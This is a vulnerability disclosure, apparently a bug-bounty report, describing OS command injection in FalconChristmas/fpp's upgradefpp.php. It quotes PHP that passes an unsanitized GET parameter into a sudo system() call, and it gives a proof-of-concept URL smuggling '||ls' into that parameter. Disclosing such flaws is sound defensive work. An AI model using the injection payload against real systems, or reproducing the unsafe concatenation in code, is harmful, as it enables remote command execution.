OS Command Injection in FalconChristmas/fpp

Valid
Reported on May 29th 2021

✍️ Description

The version variable is directly embeded in a OS command in https://github.com/FalconChristmas/fpp/blob/123cdf2eb11062766da333a7a4d85bc0bf620e47/www/upgradefpp.php#L54

    $version = $_GET['version'];
/**/
    $command = "sudo /opt/fpp/scripts/upgrade_FPP " . $version . " 2>&1";

    echo "Command: $command\n";
    echo "----------------------------------------------------------------------------------\n";
    system($command);

🕵️‍♂️ Proof of Concept

Visit http://127.0.0.1/upgradefpp.php?version=||ls

💥 Impact

RCE